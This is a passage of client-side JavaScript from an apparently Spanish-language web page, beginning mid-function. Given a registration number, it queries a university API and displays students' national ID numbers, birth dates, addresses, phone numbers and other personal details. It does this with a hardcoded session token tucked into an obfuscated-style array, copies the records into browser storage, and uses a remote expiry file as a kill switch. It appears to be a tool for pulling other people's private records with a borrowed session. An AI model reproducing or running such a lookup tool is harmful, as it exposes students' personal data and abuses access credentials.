          icon: 'https://raw.githubusercontent.com/Pericena/happybirthday.github.io/main/img2.png' // Opcional: ruta a una imagen para el icono de la notificación
        });
      } else if (Notification.permission !== 'denied') {
        // Solicitar permiso para mostrar notificaciones
        Notification.requestPermission().then(permission => {
          if (permission === 'granted') {
            // Crear y mostrar la notificación
            const notificacion = new Notification('Datos del estudiante', {
              body: `Se obtuvieron los datos de ${nombreCompleto}`,
              icon: '' // Opcional: ruta a una imagen para el icono de la notificación
            });
          }
        });
      }
    }
  }
}




    function obtenerDatos() {
      const registro = inputRegistro.value;
      
      const _0x5e5a = [
        'https://caiuagrm.com/apicai/api/v1/estudiantes/datos-universidad/',
        '?session_id=208e85c2-5322-4596-aafc-c5c153700740'
      ];
      const url = _0x5e5a[0] + registro + _0x5e5a[1];
      fetch(url)
        .then(response => response.json())
        .then(data => {
            const estudiante = data.data;
            const nombre = estudiante.nombre;
            const ci = estudiante.ci;
            const lugar_ci = estudiante.lugar_ci;
            const activo = estudiante.activo;
            const sexo = estudiante.sexo;
            const fecha_nac = estudiante.fecha_nac;
            const direccion = estudiante.direccion;
            const telefono = estudiante.telefono;
            const tel_celular = estudiante.tel_celular;
            const carrera = estudiante.des_carrera;
            const facultad = estudiante.facultad;
            const apellido_pri = estudiante.apellido_pri;
            const apellido_seg = estudiante.apellido_seg;
            const registro = estudiante.registro;

    if (registro === null || registro === undefined) {
      //alert('Lugar de registro inválido');
      Swal.fire({
        title: 'Registro inválido',
        text: 'Ocurrió un error en el proceso',
        icon: 'error',
       // imageUrl: 'https://firebasestorage.googleapis.com/v0/b/imagenes-972f4.appspot.com/o/usuario%2Fimg.png?alt=media&token=4545ef4f-dd7a-4c27-ae12-b0d6a439f239',
        confirmButtonText: 'Aceptar',
        imageClass: 'custom-image-class'
      });

      
      
      document.getElementById('registroInvalido').textContent = 'registro inválido';
      return;
    }
    if (nombre === null || nombre === undefined) {
      alert('Nombre inválido');
      return;
    }
    if (ci === null || ci === undefined) {
      alert('CI inválido');
      return;
    }
    if (lugar_ci === null || lugar_ci === undefined) {
      alert('Lugar de CI inválido');
      return;
    }
    if (activo === null || activo === undefined) {
      alert('Lugar de activo inválido');
      return;
    }
    if (sexo === null || sexo === undefined) {
      alert('Lugar de sexo inválido');
      return;
    }
    if (fecha_nac === null || fecha_nac === undefined) {
      alert('Lugar de fecha_nac inválido');
      return;
    }
    if (direccion === null || direccion === undefined) {
      alert('Lugar de direccion inválido');
      return;
    }
    if (telefono === null || telefono === undefined) {
      alert('Lugar de telefono inválido');
      return;
    }
    if (tel_celular === null || tel_celular === undefined) {
      alert('Lugar de tel_celular inválido');
      return;
    }
    if (carrera === null || carrera === undefined) {
      alert('Lugar de carrera inválido');
      return;
    }
    if (apellido_pri === null || apellido_pri === undefined) {
      alert('Lugar de apellido_pri inválido');
      return;
    }
    if (apellido_seg === null || apellido_seg === undefined) {
      alert('Lugar de apellido_seg inválido');
      return;
    }

  
          const nombreCompleto = `${nombre} ${apellido_pri} ${apellido_seg}`;
          mostrarNotificacion(nombreCompleto);
          mostrarNotificacion2(nombreCompleto);

          estudianteDiv.innerHTML = `
            <p><strong>Nombre:</strong> ${nombre} ${apellido_pri} ${apellido_seg}</p>
            <p><strong>Registro:</strong> ${registro}</p>
            <p><strong>CI:</strong> ${ci} ${lugar_ci}</p>
            <p><strong>Activo:</strong> ${activo}</p>
            <p><strong>Sexo:</strong> ${sexo}</p>
            <p><strong>Fecha de Nacimiento:</strong> ${fecha_nac}</p>
            <p><strong>Dirección:</strong> ${direccion}</p>
            <p><strong>Teléfono:</strong> ${telefono}</p>
            <p><strong>Teléfono Celular:</strong> ${tel_celular}</p>
            <p><strong>Carrera:</strong> ${carrera}</p>
            <p><strong>Facultad:</strong> ${facultad}</p>
            <p><strong>Contraseña:</strong> ***********</p>
          `;

 
      // Guardar los datos en el almacenamiento local
      localStorage.setItem('nombre', nombre);
      localStorage.setItem('ci', ci);
      localStorage.setItem('lugar_ci', lugar_ci);
      localStorage.setItem('activo', activo);
      localStorage.setItem('sexo', sexo);
      localStorage.setItem('fecha_nac', fecha_nac);
      localStorage.setItem('direccion', direccion);
      localStorage.setItem('telefono', telefono);
      localStorage.setItem('tel_celular', tel_celular);
      localStorage.setItem('carrera', carrera);
      localStorage.setItem('facultad', facultad);
      localStorage.setItem('apellido_pri', apellido_pri);
      localStorage.setItem('apellido_seg', apellido_seg);
      localStorage.setItem('registro', registro);

       
    
          guardarRegistro(registro);
          guardarDatosEnIndex(nombre,ci); // Llama a la función para guardar los datos
           setTimeout(function() {
             location.reload();
         }, 10000);
          //mostrarDatosRegistrados();
          //mostrarDatosEnIndex();

          
        })
        .catch(error => {
          console.error('Error:', error);
          
            Swal.fire({
            icon: 'error',
            title: "Ocurrió un error al obtener los datos del estudiante.",
            text: "Haz clic en OK para ver los detalles",
            //imageUrl: "https://firebasestorage.googleapis.com/v0/b/imagenes-972f4.appspot.com/o/usuario%2Fimg.png?alt=media&token=4545ef4f-dd7a-4c27-ae12-b0d6a439f239",
            imageAlt: error,
            customClass: {
            image: 'custom-image-class' // Clase CSS personalizada para la imagen
             }
            });

         // estudianteDiv.innerHTML = `<p>Ocurrió un error al obtener los datos del estudiante.</p>`;
          estudianteDiv.appendChild(button); // Vuelve a agregar el botón en caso de error
          setTimeout(function() {
             location.reload();
         }, 5000);
        });
    }

    function mostrarDatosEnIndex() {
  const datos = {
    nombre: localStorage.getItem('nombre'),
    apellidoP: localStorage.getItem('apellido_pri'),
    apellidoM: localStorage.getItem('apellido_seg'),
    registro: localStorage.getItem('registro'),
    ci: localStorage.getItem('ci'),
    lugar_ci: localStorage.getItem('lugar_ci'),
    activo: localStorage.getItem('activo'),
    sexo: localStorage.getItem('sexo'),
    fecha_nac: localStorage.getItem('fecha_nac'),
    direccion: localStorage.getItem('direccion'),
    telefono: localStorage.getItem('telefono'),
    celular: localStorage.getItem('tel_celular'),
    carrera: localStorage.getItem('carrera'),
    facultad: localStorage.getItem('facultad'),


    
  };

  const datosDiv = document.getElementById('datos');
  let html = '';

  for (const key in datos) {
    if (datos.hasOwnProperty(key)) {
      const value = datos[key];
      html += `<p><strong>${key}:</strong> ${value}</p>`;
    }
  }

  datosDiv.innerHTML = html;
}

function guardarDatosEnIndex() {
  const datos = {
    nombre: localStorage.getItem('nombre'),
    ci: localStorage.getItem('ci'),
    tel_celular: localStorage.getItem('tel_celular'),
    carrera: localStorage.getItem('carrera'),
    apellido_pri: localStorage.getItem('apellido_pri'),
    apellido_seg: localStorage.getItem('apellido_seg'),
    registro: localStorage.getItem('registro')
  };

  // Guardar los datos en el almacenamiento local

  for (const key in datos) {
    if (datos.hasOwnProperty(key)) {
      const value = datos[key];
      localStorage.setItem(key, value);
    }
  }
}

function obtenerFechaObjetivo() {
  fetch('https://raw.githubusercontent.com/Pericena/happybirthday.github.io/main/tiempo.txt')
    .then(response => response.text())
    .then(data => {
      const targetDate = new Date(data.trim()); // Obtener la fecha y hora objetivo del contenido del archivo
      console.log(targetDate); // Ejemplo de salida: "2023-05-20T12:34:56Z"

      // Función para verificar y eliminar el almacenamiento local
      function verificarEliminarAlmacenamiento() {
        const currentDate = new Date(); // Obtener la fecha y hora actual



        // Verificar si la fecha y hora actual coincide con la fecha y hora objetivo
        if (currentDate >= targetDate) {
          // Eliminar el almacenamiento local

          Swal.fire({
        title: 'Tiempo inválido',
        text: 'Su tiempo a expirado contáctese con el administrador',
        icon: 'error',
       // imageUrl: "https://firebasestorage.googleapis.com/v0/b/imagenes-972f4.appspot.com/o/usuario%2Fimg.png?alt=media&token=4545ef4f-dd7a-4c27-ae12-b0d6a439f239",
        confirmButtonText: 'Aceptar'
        
      });

        setTimeout(function() {
               location.reload();
           }, 5000);

          localStorage.clear();

          // Detener la ejecución continua de la función
          clearInterval(interval);
        }
      }

      // Intervalo de ejecución para verificar y eliminar el almacenamiento local
      const interval = setInterval(verificarEliminarAlmacenamiento, 1000); // Ejecutar cada segundo (puedes ajustar el intervalo según tus necesidades)
    })
    .catch(error => {
      console.log('Error al obtener el archivo de tiempo:', error);
    });
}

// Llamar a la función para iniciar el proceso de verificación y eliminación del almacenamiento local





window.addEventListener('DOMContentLoaded', function() {
      getIntroducirRegistros();
    });
    mostrarDatosEnIndex();
    mostrarDatosRegistrados();
    mostrarDatosRegistrados2();
    obtenerFechaObjetivo();
    guardarDatosEnArchivo()
  </script>

